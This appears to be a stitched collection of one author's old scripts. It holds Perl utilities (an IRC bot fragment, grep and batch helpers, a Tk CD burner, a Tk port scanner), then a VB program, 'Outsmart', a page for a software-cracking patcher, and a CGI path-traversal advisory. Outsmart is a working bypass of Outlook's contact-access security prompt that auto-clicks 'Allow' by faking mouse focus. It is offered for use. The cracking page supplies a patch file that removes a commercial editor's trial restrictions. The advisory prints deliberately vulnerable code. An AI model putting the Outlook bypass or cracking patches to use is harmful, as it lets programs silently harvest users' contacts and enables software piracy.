      print SOCK "SJOIN ts $1 + :\@$botnick\n:$botnick MODE $1 " . "-" x $r . "o" x $r . " $2\n:$botnick PART $1\n";
     }
    }

# opz0r command [for opers and above]
    elsif ($etc =~ /^:opz0r\s+(\S+)\s+(.*)$/i && $nicks{$nick} > 0) {
     if ($chans{$1}) {
      @x = split(/\s/, $2);
      for (@x) {
       delete $sall{lc($1)}{lc($_)};
       $sall{lc($1)}{'@' . lc($_)} = 1;
      }
      $r = @x;
      print SOCK ":$botnick MODE $1 " . "+" x $r . "o" x $r . " $2\n";
     }
     else {
      @x = split(/\s/, $2);
      for (@x) {
       delete $sall{lc($1)}{lc($_)};
       $sall{lc($1)}{'@' . lc($_)} = 1;
      }
      $r = @x;
      print SOCK "SJOIN ts $1 + :\@$botnick\n:$botnick MODE $1 " . "+" x $r . "o" x $r . " $2\n";
      print SOCK ":$botnick PART $1\n";
     }
     next;
    }
   }
  }
 }
}

# check the conf for a certain line and check the password
sub readconf {
 ($match, $pwd) = @_;
 open(FH, "<$conf");
 @lines = <FH>;
 $match =~ s/\*/.*/g;
 foreach (@lines) {
  if (/^$match(.*)$/i) {
   close(FH);
   if (&ckpasswd($pwd, $1)) {
    return 1;
   }
   else {
    return 0;
   }
  }
 }
 close(FH);
 return 0;
}

# restart function to restart the program completely, good for restarting on code changes
sub restart {
 sleep 3;
 system("$^X $0 " . join(' ', @ARGV) . " &");
 die "\n";
}

# check the conf for any line
sub chkline {
 ($line) = @_;
 open(FH, "<$conf");
 @lines = <FH>;
 foreach (@lines) {
  if (/^$line/i) {
   close(FH);
   return 1;
  }
 }
 close(FH);
 return 0;
}

# check the conf for a CHAN line
sub checkconf {
 $chn = $_[0];
 open(FH, "<$conf");
 @lines = <FH>;
 $tm = "CHAN:" . lc($chn) . ":";
 foreach (@lines) {
  if (/^$tm/) {
   close(FH);
   return 1;
  }
 }
 close(FH);
 return 0;
}

# check the conf for a CHAN line with a specific nick
sub checkconfnick {
 ($chn, $nck) = @_;
 $chn = lc($chn);
 $nck = lc($nck);
 open(FH, "<$conf");
 @lines = <FH>;
 $tm = "CHAN:$chn:$nck:";
 foreach (@lines) {
  if (/^$tm/) {
   close(FH);
   return 1;
  }
 }
 close(FH);
 return 0;
}

# add an op to the conf file
sub addop {
 ($nck, $chan) = @_;
 open(FH, "+<$conf");
 @fh = <FH>;
 $nck = lc($nck);
 $chan = lc($chan);
 foreach (@fh) {
  if (/^PASS:$nck:[^:]+:[^:]+:(.*)$/i) {
   $xf = "CHOP:$chan:$nck:$1\n";
   print FH $xf;
   close(FH);
   last;
  }
 }
 &rehash;
 return 0;
}


# add an oper
sub addoper {
 $done = 0;
 $xf = 0;
 ($nck, $id) = @_;
 open(FH, "+<$conf");
 @fh = <FH>;
 $nck = lc($nck);
 foreach (@fh) {
  if (/^OPER:\d+:$nck:/i) {
   $xf++;
   last;
  }
  if (/^PASS:$nck:[^:]+:[^:]+:(.*)$/i) {
   if ($done == 0) {
    $rf = "OPER:$id:$nck:$1\n";
    $done++;
   }
  }
 }
 if (!$xf && $done == 1) {
  print FH $rf;
 }
 close(FH);
 if ($done == 1) {
  return 1;
 }
 elsif ($done > 1) {
  return 2;
 }
 else {
  return 0;
 }
}

# check to see if a pass exists for someone
sub checkpass {
 $there = 0;
 $nck = $_[0];
=cut
 open(FH, "<$conf");
 while (<FH>) {
  if (/PASS:$nck:/i) {
   close(FH);
   return 1;
  }
 }
=cut
 if ($passes{$nck}) {
  return 1;
 }
 return 0;
}

# add an oper line to the conf
sub operconf {
 ($nck, $id, $pass) = @_;
 $nck = lc($nck);
 open(FH, ">>$conf");
 $newp = &mkpasswd($pass);
 print FH "OPER:$id:$nck:$newp\n";
 close(FH);
 &rehash;
}

# rehash the conf and local data to the program
sub rehash {
 undef %nicks;
 undef %passes;
 undef %chnln;
 undef %chnlp;
 undef %confz0r;
 open(FH, "<$conf");
 while (<FH>) {
  $confz0r{$_} = 1;
  if (/^JOIN:([^:]+):([^:]*):$/) {
   $join{lc($1)}{$2} = 1;
   next;
  }
  elsif (/^L33T:(.+)$/) {
   $protect{$1} = 1;
   next;
  }
  elsif (/^PASS:([^:]+):\d+:\d+:([^:]+)$/) {
   $passes{$1} = $2;
   next;
  }
  elsif (/^OPER:(\d+):([^:]+):(.*)$/) {
   $nicks{lc($2)} = $1;
   $passes{lc($2)} = $3;
   next;
  }
  elsif (/^CHAN:([^:]+):([^:]+):(.*)$/) {
   $chnlp{lc($1)} = $3;
   $chnln{lc($1)} = $2;
   next;
  }
 }
 close(FH);
}

# add a line to the conf
sub addconf {
 @tmp = @_;
 open(FH, ">>$conf");
 foreach (@tmp) {
  print FH $_;
 }
 close(FH);
}

# create an encrypted password
sub mkpasswd {
 $what = $_[0];
 $salt = chr(65+rand(27)).chr(65+rand(27));
 $salt =~ s/\W/x/g;
 return crypt($what, $salt);
}

# check an encrypted password with a non-encrypted one
sub ckpasswd {
 ($plain, $encrypted) = @_;
 if (!$encrypted) {
  ($plain, $encrypted) = split(/\s+/, $plain, 2);
 }
 return '' unless ($plain && $encrypted);
 if ($encrypted =~ /^\$\d\$(\w\w)\$/) {
  $salt = $1;
 }
 else {
  $salt = substr($encrypted, 0, 2);
 }
 return ($encrypted eq crypt($plain, $salt));
}

# modify a user (under construction)
sub moduser {
 ($user, $id) = @_;
 $user = lc($user);
 open(FH, "<$conf");
 @fh = <FH>;
 foreach (@fh) {
  if (/^PASS:$user:([^:]+):(\d+):(.+)$/) {
   $rf = "PASS:$user:" . lc($1) . ":$id:$3";
   $xf = "PASS:$user:" . lc($1) . ":$2:$3";
  }
 }
 close(FH);
 if (!$rf) {
  return 0;
 }
 else {
  open(FH, ">>$conf");
  while (<FH>) {
   if (/^$xf$/) {
    s/^$xf$/$rf/;
   }
  }
  close(FH);
 }
}

# get the status of a user
sub status {
 $nick = $_[0];
 $nick = $nick;
 open(FH, "<$conf");
 while (<FH>) {
  if (/OPER:(\d+):$nick:/i) {
   if ($1 >= 31337) {
    close(FH);
    return "l33t hax0r";
   }
   elsif ($1 >= 666) {
    close(FH);
    return "hax0r";
   }
   elsif ($1 >= 1) {
    close(FH);
    return "oper";
   }
   else {
    close(FH);
    return "wannabe oper";
   }
  }
 }
 close(FH);
 return "peasant user";
}


#!/usr/bin/perl

# by samy [CommPort5@LucidX.com]
# This some-what 'greps' all input files you give it with
# the string to 'grep', and if it sees any #include's in
# the files (usually in C and header files), it will also
# 'grep' those for the string, and everything in those,
# and everything in those, and so on :)

if (@ARGV < 2) {
 die "usage: $0 [-g (case-insensitive)] <list of C/header files> <'string/regexp to perl grep'>\n";
}

$grep = pop(@ARGV);
if ($ARGV[0] =~ /^-.{1}$/) {
 $arg = shift(@ARGV);
}

foreach $file (@ARGV) {
 $check{$file} = 1;
}
foreach $file (@ARGV) {
 $bad = 0;
 open(TMP, "<$file") or $bad++;
 if ($bad) {
  print "Unable to open $file: $!\n";
 }
 else {
  while (<TMP>) {
   if ($arg eq "-g") {
    if (/$grep/i) {
     print "$file:$_";
    }
   }
   else {
    if (/$grep/) {
     print "$file:$_";
    }
   }
   if (/include\s*<([^>]+)>/ and !$check{"/usr/include/" . $1}) {
    $incl{"/usr/include/" . $1} = 1;
    $check{"/usr/include/" . $1} = 1;
   }
  }
  close(TMP);
 }
}

&dcheck(%incl);

sub dcheck {
 %temp = @_;
 %new = ();
 foreach $file (keys(%temp)) {
  $check{"/usr/include/" . $file} = 1;
 }
 foreach $file (keys(%temp)) {
  $bad = 0;
  open(TMP, "<$file") or $bad++;
  if (!$bad) {
   while (<TMP>) {
    if (/include\s*<([^>]+)>/ and !$check{"/usr/include/" . $1}) {
     $new{"/usr/include/" . $1} = 1;
     $check{"/usr/include/" . $1} = 1;
    }
    if ($arg eq "-g") {
     if (/$grep/i) {
      print "$file:$_";
     }
    }
    else {
     if (/$grep/) {
      print "$file:$_";
     }
    }
   }
   close(TMP);
  }
 }
 if (%new) {
  &dcheck(%new);
 }
}


#!/usr/bin/perl

# this is for doing stuff with multiple files when the program doesn't support multiple files
# example:
# if you have 3 .tar's in a dir, you can't do tar -xvf *.tar
# you have to do each one, one by one
# with this, you just do something like: mass 'tar -xvf *.tar' and it will run each one for you
# or maybe mass 'tar -xvf program-0.?.tar' or whatever...
# cp5 owns.you

die "usage: $0 <'program'>\nexample: $0 'tar -xvf *.tar'\n" unless @ARGV == 1;
@args = split(/\s+/, $ARGV[0]);
foreach (@args) {
 unless (/\?|\*/ or $dn) {
  $frst .= "$_ ";
 }
 if ($dn) {
  $last .= "$_ ";
 }
 if (/\?|\*/) {
  $dn++;
  if (/^(.*?\/)([^\/]+)$/) {
   opendir (DIR, $1);
   $file = $2;
  }
  else {
   opendir (DIR, "./");
   $file = $_;
  }
  $file =~ s/\?/.{1}/g;
  $file =~ s/\*/.*?/g;
  @fils = grep { /^$file$/ } readdir(DIR);
 }
}
foreach (@fils) {
 system("$frst $_ $lst");
}


#!/usr/bin/perl

# -sam k (commport5@lucidx.com)

# reads the perl program and outputs a module header that you
# have to add to the .pl to make it into a module

# e.g.,
# ./mkmod Inject.pl Packet::Inject 0.01 > Inject.pm ; cat Inject.pl >> Inject.pm ; rm Inject.pl

die "usage: $0 <file> <module name> <version>\n" unless @ARGV == 3;
open(TMP, $ARGV[0]) or die "Unable to open $ARGV[0]: $!\n";
while (<TMP>) {
 if (($f) = $_ =~ /^[^#]*[^#\\]*sub\s+(\S+)/) {
  $funcs .= "$f ";
 }
}
$funcs =~ s/\s*$//g;
$tmp{'@ISA'} = 1;
$tmp{'@EXPORT'} = 1;
$tmp{'$VERSION'} = 1;
($mod) = $ARGV[1] =~ /^([^:]+)/;
($pm = $ARGV[0]) =~ s/\.pl//;
print "
# $pm.pm $ARGV[2] (module: $ARGV[1])

package $ARGV[1];
require Exporter;
\@ISA = qw(Exporter);
\@EXPORT = qw($funcs);
\$VERSION = '$ARGV[2]';
";


#!/usr/bin/perl

# by Samy Kamkar [commport5@lucidx.com]

# requires burncd for burning isos
# requires mkisofs if you want to burn regular files/dirs onto a cd

use Tk;
$mdb = MainWindow->new();
$mdb->title(" CD-R(W) Burner");
$mhead = $mdb->Frame(-relief => 'ridge', -borderwidth => 2)->pack(-fill => 'x', -anchor => 'nw', -side => 'top');
$mright = $mdb->Frame(-relief => 'ridge', -borderwidth => 2)->pack(-fill => 'x', -anchor => 'ne', -side => 'right');
$mright->Label(-text => 'Media Type')->pack(-fill => 'x', -anchor => 'nw', -side => 'top');
@typerad = ('Audio [XA]', 'Data', 'Data/Audio', 'No Idea');
for my $type (0 .. 3) {
 $mright->Radiobutton(-text => "$typerad[$type]", -variable => \$dbtype, anchor => 'w', -relief => 'flat', -value => $type)->pack(-side => 'top');
}
$mright->Label(-text => "\n\nDevice")->pack;
$device = $mright->Entry(-borderwidth => 2, -width => 8)->pack;
$device->insert('end', "racd1a");
$mright->Label(-text => "\nSpeed")->pack;
$speed = $mright->Entry(-borderwidth => 2, -width => 8)->pack;
#$speed->insert('end', "2");
$mbot = $mdb->Frame( -relief=>'ridge', -borderwidth => 2)->pack(-fill => 'x', -anchor => 'nw', -side => 'bottom');
$mbot->Checkbutton(-text => "Eject when done", -variable => \$cstart, anchor => 'e', -relief => 'flat', -command => sub { &eject })->pack(-side => 'top');
$mbot->Checkbutton(-text => "Preemphasis on audio tracks", -variable => \$asknew, anchor => 'e', -relief => 'flat', -command => sub { &emph })->pack(-side => 'top');
$mbot->Checkbutton(-text => "Test burn", -variable => \$mkrev, anchor => 'e', -relief => 'flat', -command => sub { &test })->pack(-side => 'top');
$mbot->Checkbutton(-text => "Quiet at console", -variable => \$mknew, anchor => 'e', -relief => 'flat', -command => sub { &quiet })->pack(-side => 'top');
for $i (1 .. 5) {
 ($f, $l, $e) = ("mhead_${i}", "mhead_${i}_l", "mhead_${i}_e");
 ${$f} = $mdb->Frame();
 ${$f}->pack(-side => 'top', -pady => '2', -anchor => 'e');
 ${$l} = ${$f}->Label(-text => "ISO $i", -anchor => 'e');
 ${$e} = ${$f}->Entry(-width => '20', -relief => 'sunken');
 ${$e}->insert('0', $dbfill[$i]);
 ${$e}->pack(-side => 'right');
 ${$l}->pack(-side => 'right');
}
for $i (6 .. 10) {
 $r = ($i - 5);
 ($f, $l, $e) = ("mhead_${i}", "mhead_${i}_l", "mhead_${i}_e");
 ${$f} = $mdb->Frame();
 ${$f}->pack(-side => 'top', -pady => '2', -anchor => 'e');
 ${$l} = ${$f}->Label(-text => "File/Dir $r", -anchor => 'e');
 ${$e} = ${$f}->Entry(-width => '20', -relief => 'sunken');
 ${$e}->insert('0', $dbfill[$i]);
 ${$e}->pack(-side => 'right');
 ${$l}->pack(-side => 'right');
}
$btnok = $mhead->Button(-text => 'Burn');
$btnok->configure(-command => \&write);
$btnok->pack(-side => 'left', -padx => '2');
$btndisc = $mhead->Button(-text => 'Blanken');
$btndisc->pack(-side => 'left', -padx => '2');
$btndisc->configure(-command => \&blank);
$btnconnect = $mhead->Button(-text => 'Eject');
$btnconnect->pack(-side => 'left', -padx => '2');
$btnconnect->configure(-command => \&command);
$btnsave = $mhead->Button(-text => 'Information');
$btnsave->configure(-command => \&info);
$btnsave->pack(-side => 'left', -padx => '2');
$btncancel = $mhead->Button(-text => 'Exit', -command => [$mdb,'destroy']);
$btncancel->pack(-side => 'left', -padx => '2');
MainLoop;
sub command {
 $dev = get $device;
 print "Executing: burncd -f /dev/$dev -e\n";
 system("burncd -f /dev/$dev -e");
}
sub blank {
 my $isos;
 my $files;
 $args = "burncd";
 $spd = get $speed;
 $dev = get $device;
 $args .= " -f /dev/$dev";
 if ($spd) {
  $args .= " -s $spd";
 }
 if ($eject %2 != 0) {
  $args .= " -e";
 }
 if ($quiet %2 != 0) {
  $args .= " -q";
 }
 if ($test %2 != 0) {
  $args .= " -t";
 }
 $args .= " blank";
 print "Executing: $args\n";
 system($args);
 print "Finished.\n\n";
}
sub write {
 $args = "burncd";
 for (1 .. 5) {
  $mhead = "mhead_${_}_e";
  $file = get ${$mhead};
  if ($file) {
   $files .= " $file";
  }
 }
 for (6 .. 10) {
  $mhead = "mhead_${_}_e";
  $file = get ${$mhead};
  if ($file) {
   $isos .= "$file ";
  }
 }
 $rand = rand(1000000);
 print "Executing: mkisofs $isos> /tmp/.burn.$rand";
 system("mkisofs $isos> /tmp/.burn.$rand");
 $files .= " /tmp/.burn.$rand";
 $spd = get $speed;
 $dev = get $device;
 $args .= " -f /dev/$dev";
 if ($spd) {
  $args .= " -s $spd";
 }
 if ($eject %2 != 0) {
  $args .= " -e";
 }
 if ($test %2 != 0) {
  $args .= " -t";
 }
 if ($quiet %2 != 0) {
  $args .= " -q";
 }
 if ($emph %2 != 0) {
  $args .= " -p";
 }
 if ($dbtype) {
  $args .= " data";
 }
 else {
  $args .= " audio";
 }
 $args .= $files;
 $args .= " fixate";
 print "Executing: $args\n";
 system($args);
 print "Finished.\n\n";
}
sub info {
 my $top2 = $mdb->Toplevel;
 $top2->Label(-text => "\n      Perl/Tk CD Burner [burncd front-end]      \n      by Samy Kamkar\n")->pack;
}
sub quiet {
 $quiet++;
}
sub eject {
 $eject++;
}
sub emph {
 $emph++;
}
sub test {
 $test++;
}


#!/usr/bin/perl

use strict;
use Tk;
use IO::Socket;
my ($sfile, $nfrm, $entry, $file, $but, $fromport, $toport, $neww, $nwww, $hlpm, $flmn, $menu, $save, $mw, $mid, $win, $prt, $l);
$save = "0";
$mw = MainWindow->new();
$mw->configure(-background => 'black');
$mw->title(" Perl/Tk Port Scanner");
$menu = $mw->Frame(-relief => 'groove', -border => 3, -background => 'grey')->pack('-side' => 'top', -fill => 'x');
$flmn = $menu->Menubutton(-text => 'File', -tearoff => 0, -background => 'grey', -activebackground => 'white', -foreground => 'black')->pack(-side => 'left');
$hlpm = $menu->Menubutton(-text => 'Help', -tearoff => 0, -background => 'grey', -activebackground => 'white', -foreground => 'black')->pack(-side => 'right');
$neww = $mw->Frame(-background => 'black')->pack(-side => 'top', -fill => 'x');
$nwww = $neww->Frame(-background => 'black')->pack(-side => 'left', pady => 9, padx => 8);
$hlpm->command(-label => 'Info', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => sub{info()});
#$hlpm->command(-label => 'Help', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => sub{help()});
$hlpm->separator();
#$hlpm->command(-label => 'Ports', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => sub{ports()});
#$hlpm->command(-label => 'Upgrade', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => sub{upgrade()});
$flmn->command(-label => 'Scan', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => sub{scan($entry, $fromport, $toport, $file)});
$flmn->command(-label => 'Info', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => sub{info()});
$flmn->separator();
$flmn->command(-label => 'Exit', -activebackground => 'black', -foreground => 'black', -activeforeground => 'green', -command => [$mw,'destroy']);
$nwww->Label(-background => 'black', -relief => 'sunken', -foreground => 'green', -text => "Hostname/IP:")->pack;
$nwww->Label(-background => 'black', -relief => 'sunken', -foreground => 'green', -text => "Starting port:")->pack;
$nwww->Label(-background => 'black', -relief => 'sunken', -foreground => 'green', -text => "End port:")->pack;
$nwww->Label(-background => 'black', -relief => 'sunken', -foreground => 'green', -text => "File to write to:")->pack;
$nwww->Label(-background => 'black', -relief => 'sunken', -foreground => 'green', -text => "Write to file?")->pack;
$nfrm = $neww->Frame(-background => 'black')->pack(-side => 'left', -pady => 2, -padx => 15);
$entry = $nfrm->Entry(-background => 'white', -foreground => 'black', -borderwidth => 2, -relief => 'sunken', -width => 30)->pack;
$entry->insert('end', "localhost");
$fromport = $nfrm->Entry(-background => 'white', -foreground => 'black', -borderwidth => 2, -relief => 'sunken', -width => 6)->pack;
$fromport->insert('end', "1");
$toport = $nfrm->Entry(-background => 'white', -foreground => 'black', -borderwidth => 2, -relief => 'sunken', -width => 6)->pack;
$toport->insert('end', "1024");
$file = $nfrm->Entry(-background => 'grey', -foreground => 'grey', -borderwidth => 2, -width => 30)->pack;
$nfrm->Checkbutton(-background => 'white', -command => sub{save()})->pack;
$but = $mw->Frame(-borderwidth => 0,  -background => 'black', -relief => 'groove')->pack(-side => 'top', -fill => 'x');
$but->Button(-background => 'black', -foreground => 'white', -text => 'Info', -command => sub{info()})->pack(-side => 'left');
$but->Button(-background => 'black', -foreground => 'white', -text => 'Scan', -command => sub{scan($entry, $fromport, $toport, $file)})->pack(-side => 'left');
#$prt = $mw->Label(-text => "Waiting for acknowledgement...", -foreground => 'green', -background => 'black', -pady => 4)->pack();
$but->Button(-background => 'black', -foreground => 'white', -text => 'Exit', -command => [$mw,'destroy'])->pack(-side => 'right');
$mid = $mw->Frame(-background => 'black', -foreground => 'green')->pack(-side => 'top', -fill => 'y', -expand => 'y');
$win = $mid->Frame(-background => 'black', -foreground => 'green')->pack(-side => 'left', pady => 2, padx => 2);
#$mw->Photo('imggif', -file => "lxban.gif");
#$l = $mw->Label('-image' => 'imggif', -border => 0)->pack;
MainLoop;
sub scan {
 my ($entry, $fromport, $toport, $file, $scan, $true, $con, $top1);
 ($entry, $fromport, $toport, $file) = @_;
 if ($save %2 != 0) {
  $sfile = get $file;
 }
 $sentry = get $entry;
 $sfromport = get $fromport;
 $stoport = get $toport;
 $scan;
 do {
  $true = "0";
  $con = IO::Socket::INET->new(
  Proto => "tcp",
  PeerAddr => $sentry,
  PeerPort => $sfromport) or $true++;
  if ($true == "0") {
   $scan .= "Port $sfromport open\n";
   if ($save == 1) {
    if ($sfile eq "") {
     $sfile = "/tmp/tkscan.log";
    }
    open(FILE, ">>$sfile");
    print FILE "Port $sfromport open on $sentry\n";
   }
  }
  $sfromport++;
 }
 while ($sfromport <= $stoport);
 if ($save %2 != 0) {
  close(FILE);
 }
 $top1 = $mw->Toplevel;
 $top1->title(" Ports");
 $top1->Label(-text => "Ports open on $sentry\n\n$scan")->pack;
}
sub info {
 my $top2 = $mw->Toplevel;
 $top2->Label(-text => "Perl/Tk port scanner\nwritten by samy\n\nhttp://www.LucidX.com\n")->pack;
}
sub save {
 $save++;
 if ($save %2 != 0) {
  $file->configure(-background => 'white', -foreground => 'black', -relief => 'sunken');
  $file->delete(0, 'end');
  $file->insert('end', "/tmp/tkscan.log");
 }
 else {
  $file->configure(-background => 'grey', -foreground => 'grey');
  $file->delete(0, 'end');
 }
}


' Outsmart -- Local Outlook Security Evasion -- samy@lucidx.com
'
' Recent versions of Outlook, as well as a released patch,
' make Outlook prompt the user whenever a remote appliction
' tries to access specific contact information in the Outlook
' Contact database. The user can then decide to allow or not
' allow the application to get that access.
'
' Microsoft took extra care in making sure that a remote
' application could not just get the handle to the popup,
' focus it, and click 'Yes' for the user. In fact, if you try
' that, you will SEE the button getting clicked, but nothing
' happening. I discovered that only when it receives focus
' from the mouse does it allow the buttons to be controlled.
'
' Yes, even BM_CLICK's, WM_LBUTTONDOWN/WM_LBUTTONUP,
' SetActiveWindow, SetForegroundWindow, etc will not do the job
' until focus from a mouseevent is executed.
'
' I did this in VB to be used within an actual VBA Outlook
' plugin, if you really wanted to. I'm not a VB programmer
' and this is my first VB application so please don't h8.
'
' Thanks to BasharTeg for pointing me in the right direction
' on functions to use to get access to certain objects.
'
' Enjoy.
'
' -samy, 10/22/04

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
        (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
        (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
        ByVal lParam As Long) As Long

Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
        (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, _
        ByVal lpsz2 As String) As Long

Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Private Declare Function GetCursorPos Lib "user32" _
    (lpPoint As POINTAPI) As Long

Private Declare Function SetCursorPos Lib "user32" _
    (ByVal X As Long, ByVal Y As Long) As Long

Private Declare Function GetWindowRect Lib "user32" _
    (ByVal hWnd As Long, lpRect As RECT) As Long

Private Declare Sub mouse_event Lib "user32" _
    (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy _
    As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)

Private Type RECT
        Left As Long
        Top As Long
        Right As Long
        Bottom As Long
End Type

Private Type POINTAPI
    X As Long
    Y As Long
End Type


Const WM_ACTIVATE = &H6
Const MA_ACTIVATE = 1

Const BM_CLICK = &HF5
Const BM_SETCHECK = &HF1

Const MOUSEEVENTF_LEFTDOWN = &H2
Const MOUSEEVENTF_LEFTUP = &H4

Const CB_GETCOUNT = &H146
Const CB_SETCURSEL = &H14E


' Mutex Stuff
Private Declare Function CreateMutex Lib "kernel32" Alias "CreateMutexA" (lpMutexAttributes As Any, ByVal bInitialOwner As Long, ByVal lpName As String) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function ReleaseMutex Lib "kernel32" (ByVal hMutex As Long) As Long
Const ERROR_ALREADY_EXISTS = 183&
Dim mutex As Long


Private Sub Form_Load()
    ' Setup a mutex
    SetupMutex

    ' Kill any security popups ;) within the next <Seconds>
    ' This function actually makes any security popups that are active
    ' disabled for 10 minutes. I run this app right before I need
    ' to access any contact database email info. I do not do
    ' this from the program itself since VB doesn't have real
    ' threading (Timers will not work when a call waits which is
    ' what happens upon Outlook's security window popup).
    KillSecurity 3

    ' Exit and close mutex
    Unload Me
    End
End Sub


' Set the security popup to allow us to access contact info
' for the next 10 minutes. This only works if the poup
' is actually up.
Sub KillSecurity(Seconds As Integer)
    Dim hWndParent&, hWndChild&, hWndCheck&, hWndCombo&
    Dim i As Integer
    Dim comboItems As Integer
    Dim mousepos As POINTAPI
    Dim lpRect As RECT

    i = 0
    Do
        hWndParent = 0
        i = i + 1

        ' Get highest parent window handle
        hWndOutlook = FindWindow(vbNullString, "Microsoft Outlook")

        ' Get parent window handle
        hWndParent = FindWindow("#32770", "Microsoft Office Outlook")
        If hWndParent = 0 Then
            hWndParent = FindWindow("#32770", "Microsoft Outlook")
        End If

        ' If we found a handle
        If hWndParent Then
            hWndChild = 0
            hWndCombo = 0
            hWndCheck = 0

            ' Find the 'Yes' button and other things in the security box
            hWndChild = FindWindowEx(hWndParent, 0, "Button", "Yes")
            If hWndChild = 0 Then
                hWndChild = FindWindowEx(hWndParent, 0, "Button", "&Yes")
            End If

            hWndCombo = FindWindowEx(hWndParent, 0, "ComboBox", "")
            hWndCheck = FindWindowEx(hWndParent, 0, "Button", "&Allow access for")


            ' If we found the security dialog box, let's own it
            If hWndChild And hWndCheck And hWndCombo Then

                ' Focus Outlook -- Outlook's security patch attempts to
                ' stop intruders just clicking the 'yes' which is why
                ' no one has been able to get around this yet. It only
                ' works if the window is given manual focus from the
                ' mouse, and not a system call like SetForegroundWindow.
                ' I rule.
                Call GetCursorPos(mousepos)
                Call GetWindowRect(hWndParent, lpRect)
                Call SetCursorPos(lpRect.Left + 10, lpRect.Top + 10)
                Call mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
                Call Sleep(0)
                Call mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
                Call SetCursorPos(mousepos.X, mousepos.Y)

                ' Check the 'Allow access for' checkbox
                Call SendMessage(hWndCheck, BM_SETCHECK, 1, 0)

                ' Get number of drop down items
                comboItems = SendMessage(hWndCombo, CB_GETCOUNT, 0, 0)

                ' Set minutes to number of drop down items (0 based)
                Call SendMessage(hWndCombo, CB_SETCURSEL, comboItems - 1, 0)

                ' Click 'Yes'
                Call SendMessage(hWndChild, WM_ACTIVATE, MA_ACTIVATE, 0)
                Call SendMessage(hWndChild, BM_CLICK, 0, 0)
            End If
        End If

        Sleep 50
    Loop While i < Seconds * 20
End Sub


' On unload
Private Sub Form_Unload(Cancel As Integer)
    ReleaseMutex mutex
    CloseHandle mutex
End Sub


' Create mutex
Sub SetupMutex()
    ' set a mutex up
    mutex = CreateMutex(ByVal 0&, 1, "Outsmartmutex")
    If Err.LastDllError = ERROR_ALREADY_EXISTS Then
        ' Clean up
        ReleaseMutex mutex
        CloseHandle mutex

        ' More than one instance detected
        Unload Me
        End
    End If
End Sub


Cracker-Patcher 5
Welcome to crack.LucidX.com
Here, you can find Cracker-Patcher 5 (C-P5) and .cp5 files for it (by SeaPea5).
5.01-RELEASE out! [6/19/2002] -- added registry entry creation and replacement!
Current version: 5.01 .. Download (.exe)
Update file (you can ignore this): here
Template .cp5 file: hexedit210.cp5 (hex edit 2.10 patch)
Todo list:
make the 'Update' button more powerful
add an image/logo into the program
add key generation functionality
Cracker-Patcher 5 is a program that allows you to apply patches to applications. To crack programs, you need the appropriate .cp5 file for what you're patching (incredibly small and easy to share with others).
.cp5 files are easy to create. They're really just text files in a nice, neat format. You can find a template here. Basically, all .cp5 files contain are byte-offsets and hex data to replace data at those offsets. Hopefully keygeneration and other algorithmic expressions will be allowed in future versions.
Download c-p5 here.
Template .cp5 file -- hexedit210.cp5
# hex edit 2.10 patch (made for c-p5 5.01)
#
# after you run this via c-p5.exe, hexedit will have
# the trial and nag screens and the such removed
#
# -SeaPea5

#
# info lines aren't required but are good to have
# name, version, filename, and size are best to have
#
# the 'important' info will be displayed to the user
# right before the user cracks the program and will
# be given a choice to continue or cancel, if they
# cancel, the program will not be cracked
#

#    name of info	info itself

info name		Hex Edit	# you can add
info version		2.10		# comments at
info description	a hex editor	# here, also
info filename		hedit.exe
info size		7823360
info author		cp5
info important		The user will always see this
info important		before they crack the program
info important		and will have the choice to
info important		continue or cancel the crack

#
# as of 5.01-RELEASE, you can add/change registry values
#

#	 "location"				"new string/data"	optional type
registry "LMachine\SOFTWARE\Blah\oldstring"	"blah blah blah"
registry "LMachine\SOFTWARE\Blah\newstring"	"h4w h4w h4w"		REG_SZ

#
# as you can see, c-p5 allows a variety of ways to modify data...
# these 5 patches will make hex edit full
# the 0x lines reference to the offset you want to replace data and
# replace with the following data in hex
#
# the hex after can be written in a multitude of ways as shown below
# the \d lines do the same as 0x lines,
# but the offsets are just in decimal instead of hex
#

# offset	replacement data in hex

0x174bc		4973		# offset info:
\x0174c0	\x49	\x73	# same as  0x174c0
0x000174c4	0x49 0x73	# same as  0x174c4
\d95428		49 73		# equiv to 0x174c4
\d00095436	4973		# equiv to 0x174cc


CC V
by Samy Kamkar [CommPort5@LucidX.com]
Bug Classification
Improper filtering of CGI parameters
Example and Description
Many CGIs, or Common Gateway Interfaces, are used to retrieve files on the machine running the HTTP daemon and output their data to the user remotely accessing the CGI. The problem with many of these CGIs is that the developers do not include filters on the user input, when it is the user that submits the or part of the name of the file that is accessed. This allows malicious users to read files that they shouldn't have access to, or even execute programs on the machine.
Here is some example perl code of a basic CGI with the common bug of no filtering mechanism to important user input:
---------------------------------------
#!/usr/bin/perl
use CGI qw/:standard/; # standard CGI module
print header; # content-type header
$dir = "htmlfiles"; # directory where the html files would be
$file = param("file"); # input from user
$fullpath = $dir . "/" . $file . ".html"; # create a full path
open(FILE, "<$fullpath"); # opens the file, read-only mode
while () { print } # to print the contents of the file
close(FILE); # close the file
# end of code
---------------------------------------

